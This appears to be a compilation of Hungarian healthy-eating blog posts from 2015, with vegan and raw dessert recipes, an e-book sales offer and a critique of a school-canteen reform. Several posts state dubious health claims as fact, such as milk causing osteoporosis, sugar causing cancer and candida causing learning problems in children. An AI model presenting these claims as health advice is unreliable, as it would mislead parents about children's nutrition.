A hajdina, más néven pohánka szénhidrátban, fehérjében, ásványi anyagokban, vitaminokban gazdag, így nagyon sok jótékony hatással rendelkezik. Segít csökkenteni a magas vérnyomást és támogatja a szív és érrendszer védelmét. Erősíti a kötőszöveteket, segíti a sejtfalak regenerálódását. Az érfalak erősítésével gátolja a hajszálerek sérüléseit, vérzéseit - visszereseknek kifejezetten ajánlott a rendszeres fogyasztása. Rosttartalma hasznos cukorbetegeknek és a székrekedésre hajlamosoknak. Segít egyes daganatos betegségek megelőzésében. Gluténérzékenyek is fogyaszthatják! Vegyszermentes (bio) hajdinát fogyassz!
Diós, mákos nyers rétesek
Aszaltam a nagy melegben sok finom gyümölcslapot, leginkább a saját termésű, bio barackomból ;) Nagyon finom, kellemesen savanykás, mert nem édesítettem semmivel. Isteni a kontraszt a méz édes diós és mákos töltelékkel ;) Hozzávalók a réteslaphoz: 1 kg őszibarack 1 banán Botmixerrel összedolgoztam, majd 4-5 mm vastagon eloszlattam egy tepsin, amit előtte kibéleltem sütőpapírral. Lefedtem […]
Mit egyen a gyerek az iskolában? 40 egészséges tízórai és uzsonna ötlet szendvics helyett
2015. szeptember 8. Éltető ételek
A gyerekek egészséges fejlődéséhez teljes értékű ételekre van szükség. Mit is jelent a teljes értékű elnevezés? Az alapanyagból nem vesznek el semmit (nem finomítják) és nem is adnak hozzá semmit (különféle adalékok, színezékek, ízfokozók). De amíg alapélelmiszernek számít a fehér BL55-ös liszt, a kristálycukor és a finomított napraforgóolaj, addig nagy változások nem lesznek. Amennyiben van időnk és lehetőségünk - legalább a tízórait és az uzsonnát - mi magunk csomagoljunk a gyerekünknek. Ötleteket keresel, hogy mit csomagolj a gyerekednek (vagy akár saját magadnak) tízóraira és/vagy uzsonnára? Fontos az, hogy egészséges és tápláló legyen az étel? Mindenképp húsmentes recepteket keresel? Kíváncsi vagy elméleti és gyakorlati tanácsokra is? Akkor ez a receptgyűjtemény neked való! Ugyanis ez a receptgyűjtemény pont erről szól. Ne felejtsd el! A gyereked egészségéért TE vagy a felelős! A receptek többsége: - gluténmentes - NYERS (RAW) - vegán Néhány kérdés, amely felmerülhet benned... Megrendelés után hogyan kapom kézhez a receptgyűjteményt? A vételár megérkezése után e-mailben megkapod a receptgyűjteményt pdf formátumban. Ezután ki is nyomtathatod, vagy akár magaddal viheted a laptopodon, okos telefonodon keresztül a konyhádba. Hogyan tudok fizetni? Átutalással, a fizetési határidő 8 nap. Megrendelés után a fizetési adatokat megkapod e-mailben. Mennyibe kerül ez a letölthető receptgyűjtemény? A kiadvány ára 2290 Ft. Mit kapsz ezért az árért? Egy 52 oldalas kiadványt, melyben vannak elméleti és gyakorlati táplálkozási tanácsok, valamint 40 recept, saját fotóval ellátva. Ízelítőül pár cím a tartalomból: - Alapelvek az ételek készítése során - Miért kerüljük a fehér lisztet, és a belőlük készült édességeket? - De miért is fontos az, hogy kevesebb glutént fogyasszunk? - Mi a baj a kristálycukorral és egyéb mesterséges édesítőkkel? - Milyen édesítőt használhatunk nyugodt szívvel? - Biztosan felmerül a kérdés, hogy ha nem iszik a gyermekünk tejet, akkor lesz-e elegendő kalcium a csontok növekedéséhez? - Miért fontos az olajos magok ?3-?6 aránya? - Miért kell áztatni az olajos magokat? - Mik azok az enzimgátlók? - Datolyás-sárgarépás trüffel - Áfonyás müzligolyó - Kókuszos zabkása golyó - Diós, datolyakrémes puliszkagolyó - Gyümölcsös morzsasüti - Áfonyás muffin - Serpenyős lepény Rendeld meg itt! Ez a megrendelés elektronikus úton megkötött szerződésnek minősül, mely fizetési kötelezettséggel jár, és amelyre az elektronikus kereskedelmi szolgáltatások, valamint az információs társadalommal összefüggő szolgáltatások egyes kérdéseiről szóló 2001. évi CVIII. törvény 5. és 6. §-ában foglaltak irányadóak. A szerződés a távollevők között kötött szerződésekről szóló 1999. (II.5.) Kormányrendelet hatálya alá tartozik. Ennek érdekében az elektronikus úton leadott megrendelések esetén a megrendelő 14 napon belül indoklás nélkül elállhat a szerződéstől abban az esetben, ha még nem került birtokába az elektronikus letöltéshez szükséges link. Elállási szándékodat a megrendeléstől számított 14 napon belül e-mailben jelezheted (riczu.aniko73@gmail.com). A szerződést a megrendelő űrlap kitöltésével és a Küldés gombra való kattintással Riczu József egyéni vállalkozóval kötöd (Adószám: 49495744-2-25) Fizetési feltételek: Megrendelésed után visszajelzést küldünk a megrendelés adatairól, valamint elküldjük a fizetési információkat. A fizetési határidő 8 nap.
"Bűnöző" muffin
2015. szeptember 8. Kertkonyha
Mert van, hogy kell az édes, és kell a csoki, és kell a kókusz, és kell az a kis bűnözés. Pont ekkor jön jól egy duplacsokis, kókuszos álom négy lépésben.
Hozzávalók kb. 40 db kis muffinhoz:
[...] Bővebben!
“Nutellás” datolya golyó (vegán)
2015. szeptember 7. Zizi kalandjai
Hello Szeptember? Hogy hogy már itt vagy? Végre hűlnek a nappalok és az éjszakák is… éljen! Két hónap szünet után van kedvem bekapcsolni újra a sütőt. Sőt, péntek este be is kapcsoltam, egy isteni granola készült! Jövök majd a recepttel!
Újra óvoda, iskola, munkahely… kezdünk visszarázódni a hétköznapokba. Jól jön ilyenkor a délutáni nassoláshoz valami energiát adó édesség a csokiszelet, a csokikocka, a bolti keksz helyett. Együnk inkább banánt, almát, körtét, szilvát vagy otthon készített kekszet, banánkenyeret vagy ilyen datolya golyót. Ez attól “Nutellás”, hogy egy nagy adag pirított törökmogyoró került bele, meg jó sok kakaópor. A datolya édesíti és ragasztja össze, krémesebbé pedig a mandulavaj teszi (ezt ki lehet váltani natúr törökmogyoró krémmel, de akár kesudióvajjal vagy földimogyoróvajjal is). Ha nyers kakaóport használunk és nem pirítjuk meg a mogyorót, akkor a golyók nyersek lesznek! Nassoljatok!
“Nutellás” datolya golyó (vegán)
Hozzávalók:
– 1 és 3/4 bögre törökmogyoró
– kb. 25-27 db friss datolya golyó, kimagozva (mérettől és ízléstől függ a darabszám; ha nem találtok frisset jó az aszalt is, csak figyeljetek a minőségre!)
– 5 evőkanál karob vagy (nyers) kakaópor (ha még csokisabb ízre vágytok, adhattok hozzá többet is)
– 1 evőkanál mandulavaj
– 1 evőkanál chia mag
– 4 teáskanál kókuszolaj (extra szűzzel még finomabb)
– 1/2 teáskanál só
Egy száraz serpenyőben 4-5 perc alatt pirítsuk meg a mogyorót.
Tegyük robotgépbe a mogyorót és daráljuk por állagúra. Ekkor adjuk hozzá a kimagozott datolyát és az összes többi alapanyagot. Addig dolgoztassuk a robotgépet, amíg a massza enyhén ragacsossá (kissé zsírossá a kókuszzsír miatt) válik (állítsuk le a gépet és ellenőrizzük az állagot).
Formázzunk golyókat a masszából. Zárt dobozban, hűvös helyen, hőtőben 10-12 napig eláll.
Az alma jótékony hatásai
2015. szeptember 2. Élj harmóniában
Az őszi időszak egyik kedvelt gyümölcse nyersen, sütve, főzve minden formában kitűnő választás:) A nagyon savanykás almától az egészen édes ízűig, mindenki az ízlésének megfelelőt választhatja. Az alma az egyik legismertebb és legősibb gyümölcs, amit szinte mindenki örömmel fogyaszt. Sok ezer fajtája létezik. Nyáron a borízű almákkal kezdődik a sor és késő őszig lehet szedni, szüeretelni a különböző típusokat. Vidéken szinte nincsen olyan kert, ahol ne lenne legalább egy almafa. A legismertebbek a golden, a jonatán és az idared. Az alma az egyik fő téli gyümölcsünk, mert kiválóan tárolható szinte tavaszig és jó vitaminpótlási alternatíva lehet télen. Mindenféle mondásokban is szerepelt, hogy fogyasszunk napi egy almát az egészségünk érdekében... és valóban az alma megannyi jótékony hatással rendelkezik: Magas a vitamin és ásványi anyag tartalma. C vitamin tartalma és kiemelkedő még az A és B vitamin tartalma is. Sok folsavat , magnéziumot, káliumot, ként tartalmaz . Kedvezően hat az emésztésre,a bélflórára, rendezi az anyagcserét. Jótékony székrekedés esetén , párolt változatban pedig hasmenésre ajánlják. Elősegíti a méregtelenítési folyamatokat - a májat, vesét segít tehermentesíteni és egészségesen tartani.
Menzareform helyett... tízórai és uzsonna ötletek avagy mit egyen a gyerekünk az iskolában?
2015. szeptember 1. Éltető ételek
Az előző részben megvizsgáltam azt, hogy miről is szól a szeptemberben élesben működő menzareform. Sok mindennel egyetértek, de több mindennel NEM. Nézzük sorjában... Ahogy én látom... Húsra egyáltalán nincs szükség - az előző részben írtam a Kína tanulmányról -, legalábbis ilyen mennyiségben és minőségben nem . Az Amerikai Dietetikus Társaság állásfoglalása szerint: "A vegetáriánus étrend egészséges és megfelelő tápértékű, megfelelő tervezés esetén." Tehát egy jól megtervezett lakto-ovo vegetáriánus - joghurtot, kefírt, tojást fogyasztó - táplálkozás, csecsemők, gyermekek és felnőttek számára is fedezi a szükséges tápanyagszükségletet. Sőt, sok esetben akár a vegán táplálkozás is megfelelő lehet, ha az teljes értékű és változatos. Oda kell figyelni az ételek megfelelő komplettálására, pl. csíráztatott hüvelyesek (főleg lencse, borsó, sárgaborsó, csicseriborsó) gabonákkal való társítása teljes értékű fehérjét biztosít. Valamint tartsuk azt is szem előtt, hogy a nagyüzemi tartású húsok antibiotikum és hormon tartalma nem igazán tartozik egy fejlődő szervezet szükségletei - felnőttekének sem - közé. A tejet magas hormontartalmának köszönhetően szintén nem javaslom emberi fogyasztásra . A legtöbb tejet és tejtermékeket Nagy-Britanniában, Svédországban, Finnországban és az Egyesült Államokban fogyasztják, és éppen ezekben az országokban a leggyakoribb a csontritkulás is. A tej kalciumtartalma a pasztörizálás során csökken, a hőre érzékeny enzimek elpusztulnak, melyek segítenék a maradék kalcium beépülését a csontokba. A tej kalcium-foszfor aránya nem megfelelő, valamint a tej savasodást idéz elő a szervezetben, amely semlegesítésére kalcium vonódik ki a csontokból. A hurutos megbetegedések során kifejezetten ellenjavallt a tej fogyasztása, mivel az a nyálka termelődését fokozza. Ezt ma már szerencsére sok gyermekorvos is tanácsolja. Érdemes legalább a téli hónapokban ezek fogyasztását csökkenteni. A rizzsel nincs semmi gond, ha teljes, barna rizst készítünk . Inkább rizst kínáljunk köretként, mint burgonyát. A hüvelyeseken teljesen meglepődtem. A téli hónapokban vajon miért csak 1-3 alkalommal lehet fogyasztani 10 nap leforgása alatt? Nyáron pedig csak 1x ehetünk? A hüvelyesek nagyon jó húspótlók, fehérje források, megfelelő komplettálással (pl. barna rizs) valamennyi esszenciális aminosavat biztosítjunk a szervezetünknek. A hüvelyesek között nagy vátozatosság van, a különféle száraz babok mellett lehet készíteni barna-, hegyi-, vöröslencsét; csicseriborsót, vagy akár zöld- és sárgahüvelyű babokat is. É des, cukros tejkészítményeket, mogyoró- és csokikrémeket egyáltalán nem javaslok . Természetesen el lehet készíteni ezeket egészséges formában, akkor nyugodtan kaphatja a gyermekünk akár hetente többször is. De tartok attól, hogy a menzákon kínált ilyen ételek nem az egészséges kategóriába tartoznak. Olajos magvakat viszont nyugodtan lehet fogyasztani, akár naponta is, úgy 1 maréknyit. Milyen érdekes, édesített tejkészítményeket többször engedélyez a rendelet, mint olajos magvakat... Kedvező omega3 forrás, melyek bátran fogyaszthatók napi rendszerességgel: mandula, lenmag, szezámmag, kesudió, törökmogyoró, fenyőmag, makadámdió . Bizonyos növényi olajok, magok (dió, tökmag, naprafogó, szőlőmag, mák) viszont magasabb ?6-ot tartalmaznak, így rendszeres, napi fogyasztásuk nem javasolt. De azért többször lehet enni ezeket, mint a rendeletben meghatározott 2hetente 1 alkalom. Örvendetes, hogy minden nap kell teljes kiőrlésű gabona alapú élelmiszert adni a gyerekeknek. Viszont én az előírt mindkét napi adagot ilyen gabonára cserélném. Valamint még tennék olyan szabályozást is, hogy 10 naponta legalább 3-4 nap gluténmentes legyen. Ilyenkor számos gluténmentes gabonát kínálhatunk a gyerekeknek: köles, hajdina, barna rizs, quinoa, amarant, zab, teff, kukorica. Tehát ne keményítővel teli gluténmentes lisztből készült péksüteményeket adjunk a gyerekünknek , mert az a szervezetnek egy cseppet sem jobb, mint a gluténos-cukros társai. Én egyáltalán nem vagyok híve a növényi eredetű margarinoknak . Ezek hidrogénezéssel lesznek kenhető állagúak. Igaz, hogy telítetlen zsírsavakat tartalmaznak, de nem természetesek. Akkor inkább használjunk olívaolajat vegyítve rendes vajjal. Vagy készíthetünk kenőkéket, pástétomokat, fűszervajakat. A bő zsíradékban sütés már valóban idejétmúlt, már sütőben is el lehet készíteni a (zöldség)fasírtokat és a rántott (zöldség)szeleteket. A finomított fehér krisztálycukrot teljes mértékben kitiltanám a közétkeztetésből. A modern cukorgyártás vadonatúj betegségeket hozott magával. A fogszuvasodás, a cukorbetegség, a rák, a kamaszkori pattanásos arcbőr, a koncentrálóképesség romlása mind a cukor fogyasztásának következményei. A legrosszabb az, hogy - csakúgy, mint az alkohol, a cigaretta, a kábítószer - a cukor iránt is függőség tud kialakulni, és a szervezetünk folyamatosan azt mondja: MÉG, MÉG, MÉG. Sajnos, ez a candida melegágya is. Nagyon sok gyereknél a tanulási nehézség, a magatartási zavar, a fejlődés megállása a candida gombának köszönhető. A teában megengedett maximum 10 gramm cukor 3 kockacukornak felel meg... és ez csak egy csésze tea. Természetesen szükség van az édesítésre, csak nem mindegy, hogy mivel. Lehetne mézzel (na nem a hőkezelt, t...s-s fajtára gondolok), hanem termelőire - ami tartalmazza azokat a vitaminokat és ásványi anyagokat, amik alapból benne vannak. Mi a megoldás? Én még így sem tartom megfelelőnek a közétkeztetést. Amennyiben van időnk és lehetőségünk - legalább a tízórait és az uzsonnát - mi magunk csomagoljunk a gyerekünknek. Nagyon fontos, hogy a gyerekünk minden esetben reggelizzen otthon . Ebben az esetben tízóraira elég 2-3 gyümölcs, vagy egy elkészített gyümölcssaláta pl. granolával megszórva. De diákcsemegét is készíthetünk, melybe aszalványok és olajos magok vannak. Amennyiben zöldséges a gyerkőc, akkor vághatunk fel falatnyi uborkát, paradicsomot vagy akár répát is. Ha nincs lehetőség otthoni reggelizésre, akkor annak megfelelően csomagoljunk, és még az első csengetés előtt egyen belőle. Attól függően, hogy a gyermekünk mikor kap ebédet az iskolában (a 6.-os lányom du. 2 órakor ebédelt), ahhoz igazítsuk a tízórai és az uzsonna mennyiségét. Sőt, azt is figyeljük, hogy lesz-e délutáni edzése, vagy különórája, mikor fog tudni vacsorázni. Mindenképp figyeljünk arra, hogy mennyire van meleg, valamint úgy csomagoljuk az ételeket, hogy azok délutánra se olvadjanak meg, ne essenek/törjenek össze és ne is savanyodjanak meg. Ötleteljünk egy kicsit... Nézzük csak meg, hogy milyen finomságok vannak a szendvicsen túl... Gyümölcsök és zöldségek A gyümölcs és a zöldség az, ami a lehető legegészségesebb étel, mindig kerüljön az uzsonnás dobozba! Napi legalább 6 adag (maroknyi) nyers gyümölcsöt és zöldséget kellene megenni gyermeknek és felnőttnek egyaránt. Csomagolhatjuk egészbe, de fel is szeletelhetjük/kockázhatjuk. Egy kis méretű csinos üvegbe rétegezve is tehetjük a kedvenc gyümölcseit/zöldségeit. Ezek folyékony állagban is kerülhetnek a táskába, smoothie-k formájában. De a zöld turmix is igazán finom és tápláló. Trüffelek, müzliszeletek, müzlik A trüffeleket roppant egyszerű elkészíteni, könnyen kezelhető kis falatkák. Lehet olajos mag, aszalvány kombó is, vagy különböző gabonakásákból is készíthetjük. A müzliszeleteket szintén lehet készíteni sütés nélkül is, vagy akár sütve. A gyerekek gyakran kapnak tízóraira csokis müzlit tejjel. Nos, ilyenkor csomagoljunk mi is egy adag müzlit vagy granolát és egy kis dobozos kókusz- vagy rizstejet. Ne felejtsük el ilyenkor a kanalat és a kis tálkát se. Teljes értékű édes kekszek, sütik, muffinok, piték Ezek nem olyan sütik, amiket a cukrászdában árulnak. Ezek teljes értékű alapanyagokból készülnek, rostban gazdagok, ugyanakkor nagyon finomak. A gyerekek imádják a bolti Jó reggelt és társai féle kekszeket. Nos, elkészíthetjük ezek egészséges alternatíváit. Teljes kiőrlésű gabona, egészséges édesítőszer és finomítatlan zsíradék az alapja ezen kekszeknek. Megtölthetjük nyers vagy házi lekvárokkal, nutellával vagy akár olvasztott nyers csoki is kerülhet rá. Muffinokat is gyakran készítek, gyorsan elkészülnek és könnyen csomagolhatók. A pitében pedig a gyümölcsök kedvünk szerint variálhatók. Télen az almás, körtés nyáron a szilvás és a barackos a sláger. Amerikai palacsinták, gofrik Ezeket a palacsintákat azért szeretem, mert kis méretűek, elég vastagak, és önmagukban is finomak. Persze azért tehetünk közé lekvárt vagy gyümölcsöket, de akár házi nutellával is finomak. A gofrinál is végtelen lehetőségek vannak. A könnyebb csomagolás miatt én olvasztott csokival kenem meg a tetejét, mely jól rádermed. Így, amikor a gyerekek uzsonnáznak, nem kenik össze magukat. Persze ne 30 fokos melegbe csomagoljunk ilyen csokival bevont finomságot! Édes péksütemények Nagyon gyakori étel az iskolában az ilyen édes péksütemény. Nagy kedvenc a kakaós- vagy éppen a nutellás csiga, a kalács vagy a lekváros bukta. Nos, van egy jó hírem, egészségesen is el lehet készíteni ezeket az ételeket. Sós finomságok A sok édes étel mellé bizony jól esnek a sós finomságok is. Ezek lehetnek jó sok zöldséggel töltött zsemlék, szendvicsek, pogácsák, vagy éppen pizzák. Mindegyik nagyon finom, és könnyen csomagolhatók. Számos receptet találsz a blogomon, de összeállítottam 40 egészséges tízórai és uzsonna ötletet (mely napokon belül elérhető lesz) , kivétel nélkül teljes értékű, finomított alapanyagoktól mentes. Ne felejtsd el! A gyereked egészségéért TE vagy a felelős! Viszont, ha van lehetőséged ebédet is csomagolni, ahhoz is segítséget tudok nyújtani a hamarosan megjelenő 20 csomagolható ebéd ötlettel. A tányéron túl... Az csak egy része az egészséges étkezésnek, hogy mi kerül a tányérra. Ugyanolyan fontos az is, hogy hogyan fogyasztjuk azt el. Nincs elég idő az étkezésre. Nyugodt környezetben, nem sietve, alapos rágással kellene elfogyasztani az ételt. 20 perces szünetben kezet mosni, kikérni az ebédet, megebédelni és a következő órára odaérni... nos, még egy felnőttnek is megadatik törvényileg a 30 perc. Tehát reform sajnos nemcsak az étkezésben kellene, hanem a nevelésben is.
Pálcikás szilvás-mogyorós jégkrém (nyers, vegán)
Végre visszatér megint a nyár némi időre, a legfőbb ideje, hogy elkészítsük idénygyümölcsünkből - szilvából - a következő finomságos jégkrémet. A mogyoró, szilva, csokoládé trió nekem nagyon bejön. Rétest már készítettem e három hozzávaló felhasználásával. Annyira finom volt, hogy hihetetlen gyorsan elfogyott. Most ugyanezeket az ízeket pálcikás jégkrémbe öntöttem. Az eredmény nem maradt el. Ropogós csokoládé és tört mogyoró remekül passzolt az enyhén édeskés, de tömény szilvás belsőhöz. Ajánlom minden édesszájúnak, vagy hideg ízekre vágyóknak.
A recept:
Hozzávalók:
- 2 bögre szilva
- 6-8 szem datolya
- mogyoró
- karob vagy kakaópor (vagy mindkettő fele-fele arányban)
- kókuszzsír (folyékony állapotban)
- kókuszvirág cukor vagy xylit vagy gyümölcscukor vagy datolyaszirup, stb.
- mogyoró
- alufólia
- jégkrémtartó tubusok
Elkészítés:
A szilvákat megmossuk, kimagozzuk. A datolyákat meleg vízben megáztatjuk. A turmixgép poharába a megmosott, kimagozott szilvákat beletesszük, hozzáadjuk a megpuhult datolyát, és a turmixgéppel alaposan összeturmixoljuk.
Turmixolás után kiöntjük a formákba, be a fagyasztóba és kb. 3-4 óra múlva bevonhatjuk a csokis-mogyorós külsővel. (Vagy elfogyasztjuk anélkül.)
A folyékony kókuszzsírt (ha szilárd, rövid idő alatt folyékony lesz, ha tűzhelyen melegítjük) összekeverjük karobbal/kakóporral és valamilyen édesítő-szerrel. Az egész mogyorót aprítógéppel összetörjük vagy zacsiba tesszük és pl. húsklopfolóval vagy sodrófával addig ütögetjük, míg megfelelően darabos nem lesz. A megfagyott jégkrémet belemártjuk a csokiszószba, vagy kanál segítségével bevonjuk a csokival, a mogyoróban gyors megforgatjuk (mivel hideg a jégkrém, a csokiszósz pillanatok alatt megdermed a tetején). Alufóliába csomagoljuk (nem valószínű ugyanis, hogy a külső rétegtől a formába visszacsúsztatható), rövid időre visszatesszük a fagyasztóba, hogy belülről ismét megdermedjen, ugyanis elképzelhető, hogy megolvad a belseje a kemény csokiburok alatt.
Tipp: Ha nem tudjuk a pálcikán elhelyezkedő jégkrémet azonnal a tubusából kivenni, mielőtt a csokimázba tennénk, két ujjunkkal körbefogjuk a tubus végét (ahol a pálcika közelebb van), kicsit úgymond "felmelegítjük", majd könnyedén kihúzzuk a kész jégkrémet.
Tápanyagban gazdag, sütésmentes, csíkos szelet (gluténmentes, laktózmentes, tojásmentes, nyers, vegán)
2015. augusztus 28. Zöld Avocado
Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) Lassan vége a nyárnak, kezdődik az iskola, letellik a szabadság, elindul a mókuskerék. Nem panaszkodhatunk, mert az idén bőven kijutott a napsütésből, a melegből, a strandon töltött órák számából, és még az országot sem kellett elhagynunk, hogy egy mediterrán éghajlatú tengerparton érezzük magunkat. Elég volt leruccani a Balatonra, kikérni egy koktélt, és élvezni a magyar tenger látványát, a semmittevést, a pihenést, természetesen az árnyékból. ;-) Nem meglepő, hogy keveset álltunk a tűzhely mellett, és igyekeztünk inkább gyorsan elkészíthető, lédús ételeket, édességeket fogyasztani, még az esti kerti partik alkalmával is. Úgy érzem akkor lesz igazán szép ez a történet, ha az utolsó forró nyári hétvégét is, egy sütésmentes, gyorsan elkészíthető, hűsítő, ízletes, és tápanyagban gazdag édességgel zárom a Zöld Avocado gasztroblogon. :-) Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) Egy hűtőre, egy turmix gépre, és egy kávédarálóra lesz szükségünk hozzá, és néhány természetes alapanyagra. Nem igényel sem sütést, sem főzést, sem tartósítószert, vagy plusz édesítést. Könnyen emészthető, gyomorbarát, enzimgazdag, ásványi anyagokban, vitaminokban bővelkedő, energiadús, tápláló, diétás nassolnivaló, amit étel allergiások is bátran fogyaszthatnak! :-) (Kivétel a diófélékre allergiások.) Bármilyen könnyen kocsonyásodó, kevésbé lédús gyümölccsel elkészíthetitek ezt a desszertet. Egy házi, cukor- és tartósítószermentes lekvárt kutyulunk a választott gyümölcsből az édesség tetejére. Nálam ez megint a fekete áfonya volt. Nagyon szeretjük, és lassan vége az idei évi fekete áfonya szezonnak, így még utoljára ő lett a befutó ennél a receptnél is. Remélem nem bánjátok, és a korábbi áfonyás szelet, áfonyás chia puding reggeli, és banán palacsinta után, még ezt a csíkos szeletet is szívesen megkóstoljátok házi fekete áfonya lekvárral a tetején. De ha mégsem, akkor készítsétek el pl.: lila szőlővel, eperrel, egressel, sárgabarackkal, szederrel stb. Bármivel, ami könnyen "lekvárosodik". Ha túl sok leve van, azt csepegtessétek le és igyátok meg külön. ;-) Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) És hogy miért is fogyasszunk rendszeresen fekete áfonyát? "Az áfonya többek között Észak-Amerikában őshonos növény, és régóta elismert és fontos része az amerikai indiánok étrendjének. Az indiánok jöttek rá annak idején, hogyha e bogyós gyümölccsel dörzsölik be a szárított húsokat, akkor lassíthatják azok romlását. A közelmúltban a Journal of Clinical Nutrition folyóiratban közzétett, nemrégiben készült tanulmány megállapította, hogy azon személyeknél, akik napi 15 dkg áfonyát fogyasztottak rendszeresen, a vérben lévő ANTIOXIDÁNSOK MENNYISÉGE JELENTŐSEN EMELKEDETT, és a kutatók szerint ez elengedhetetlen a különböző szív- és érrendszeri megbetegedések , a cukorbetegség, az öregedés, a rák, a makula degeneráció és a szürkehályog kialakulásának megelőzéséhez. - a vérben lévő antioxidánsok fokozott jelenléte csökkenti a mellrák kialakulásának kockázatát - az áfonya képes csökkenteni és megelőzni az öregkori betegségek (mint például az Alzheimer-kór és az elbutulás) hatásait - az antioxidánsok védenek a sejtszerkezetet és a DNS-t károsító szabad gyökökkel szemben, melyek számos degeneratív betegség okozói - az áfonya segít megőrizni az egészséges bőrt, és csökkenti a kor előrehaladtával kialakuló bőrhibákat - emésztésre gyakorolt pozitív hatása: az áfonya pektinben gazdag rostja enyhíti a hasmenés és a székrekedés tüneteit. Emellett, a gyümölcsben lévő tanninok csökkentik az emésztőrendszer gyulladását, míg a polifenolok bizonyítottan antibakteriális tulajdonságokkal rendelkeznek. - az áfonya antioxidáns védelme a szervezet vércukor szabályozó rendszerére is kedvező hatással van - rendszeres fogyasztása kimutathatóan javítja a vérzsírok egyensúlyát, vagyis csökkenti a teljes koleszterin szintjét, segít fenntartani az egészséges vérnyomás értékét - kedvező hatást gyakorol a vércukorszint optimális szabályozására - segítik a retinasejtek gyors regenerálódását " Forrás: Dietless.hu Most, hogy már látjátok, hogy miért is fogyasztunk gyakran fekete áfonyát, nézzük, hogyan készítjük el ezt a rendkívül egyszerű, sütés- és főzés tudományt nem igénylő édességet?! Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) HOZZÁVALÓK: áfonya lekvár réteghez: - 300 g friss fekete áfonya - 1 ek útifűmaghéj / vagy chia mag (elengedhetetlen, mert ettől kocsonyásodik meg a "lekvár") fehér, kókusz réteghez: - 1,5 bögre kókuszreszelék - 4 ek tetszőlegesen választott édesítő szirup pl.: Agave szirup, rizs szirup, datolya szirup, vagy jó minőségű méz - 1/2 dl + 2 ek kókusztej - 2 ek kókusz olaj (kókuszzsír) - 1/2 bögre natúr kesudió (beáztatva vízbe előző éjjel) barna, csokis réteghez: - 1,5 bögre natúr kesudió és mandula keverék (áztassuk be előző éjjelre vízbe, hogy az emésztést nehezítő enzimgátlók kioldódjanak) - 4-5 szem mag nélküli aszalt datolya vagy aszalt füge vagy aszalt szilva (áztassuk be előző éjjelre vízbe) - 2 ek kókusz olaj (kókuszzsír) - 3 ek karobpor (jó minőségű kakaó port is használhatunk, de a karob egészségesebb) Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) ELKÉSZÍTÉS: A házi cukor- és tartósítószermentes "lekvárhoz" a megmostott áfonyát turmixoljuk le, majd keverjünk hozzá útifűmaghéjat vagy chia magot, és tegyük az egészet a hűtőbe kb. fél órára. Kész is a házi áfonya "lekvár". A csíkos süti alsó rétegéhez, a barna "tésztához", az előre beáztatott kesut és mandulát (áztató víz nélkül) daráljuk le. A választott aszalt édes kötőanyagot (szilva, datolya, vagy füge) tegyük a dupla késes zöldség aprító / daráló részbe, és készístünk belőle pépet (áztató víz nélkül). A darált kesu és mandula keveréket, az aszalt datolya pépet, a kókusz olajat és a karob port kézzel gyúrjuk jó alaposan össze, míg egy nagy masszát nem kapunk. Ezt a "csokis" masszát aztán nyomkodjuk a választott sütemény formánk, vagy tálunk aljára. Ez lesz a sütemény alja. Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) A középső, fehér, kókuszos réteghez őröljünk porrá 1 bögre kókuszreszeléket, illetve külön daráljunk meg egy 1/2 bögre előre beáztatott kesudiót (áztató víz nélkül). A kókuszreszelék port, a darált kesudiót, 2 ek kókusztejjel turmixoljunk krémes állagúra. Adjuk hozzá a maradék 1/2 bögre kókuszreszeléket, a választott édesítő szirupot, 1/2 dl kókusztejet és 2 ek kókusz olajat, majd kézzel dolgozzuk össze az egész kókuszos tölteléket. Egyengessük a barna alsó rétegre. Kenjük a sütemény tetejére a házi áfonya "lekvárunkat", és ha van otthon dekorációnak szórjunk rá kókusz chipset a tetejére. Majd az egészet tegyük be a hűtőbe 3-4 órára, hogy jól vágható süteményt kapjunk. Ha nem fontos a szépség, akkor akár azonnal fogyaszthatjuk is az így elkészült gyors, egyszerű, mindenmentes, tápláló és nagyon finom édességünket! ;-) Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) Ne felejtsd el: Táplálkozz, ne csak étkezz! :-) Megjegyzés: "Ha maximalizálni szeretnénk ezen gyümölcs antioxidáns hatását, akkor lehetőleg bioáfonyát vásároljunk! Egy közelmúltban készült tanulmány ugyanis közvetlenül hasonlította össze egy organikusan, illetve nem organikusan termesztett áfonyatípus (Vaccinium corymbosum L.) teljes antioxidáns hatását, és a kutatók látványos különbségeket találtak a bio előírásoknak megfelelően termesztett áfonya javára. Ez utóbbi ugyanis a hagyományos áfonyához képest jelentősen nagyobb koncentrációban tartalmazott fenol és antocián antioxidánsokat, és a teljes antioxidáns kapacitása is lényegesen nagyobb volt." Forrás: Dietless.hu Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán)
Jóga és táplálkozás - Hogyan hatnak az ételek a testre és az elmére?
2015. augusztus 27. Élj harmóniában
Az szinte mindenki számára ismert, hogy a jóga segítségével elérhető, hogy a test erős egészséges és hajlékony legyen. A jóga jótékonyan hat az emésztésre, légzésre, keringésre, hormonrendszerre és elérhető általa a testi-lelki harmónia, a belső nyugalom. A jóga eredeti, végső célja nem a fizikai közérzet javítása, hanem önazonosságunk felfedése és az elme kontrollálásával összekapcsolódás a Legfelsőbb Forrással. Jóga nem csak sport vagy mozgásforma, ennél sokkal több ez egy önmegvalósító folyamat, amely az élet minden területére kiterjed. Az önmegvalósításhoz azonban fontos az testi egészség megőrzése, a belső béke elérése a gondolatok elcsendesítésével. A test egészségének és rugalmasságának és az elme nyugalmának megőrzéséhez az egyik kulcs a táplálkozás. A táplálkozás kihat az energiaszintünkre, egészségügyi állapotunkra, tudatunk minőségére, gondolatainkra, viselkedésünkre. Bizonyos ételek a testet rugalmassá teszik, az elmét békéssé mások merevvé, tunyává teszik a testet és feszültté, izgatottá teszik az elménket. A tudatos táplálkozás alapja, hogy legyen megfelelő tudásunk arról, hogy az ételek pontosan hogyan hatnak testünkre és elménkre. Egy gyakorló jógi életében számos alapelv jelenik meg, amely nem csak a jóga ászának kivitelezésére, de az életmódra és az étkezésre is vonatkoznak: tudatosság, az ősi jógaírásokban meghatározott elvek, szabályok követése, az egyén helyzetének figyelembe vétele, kontroll elérése 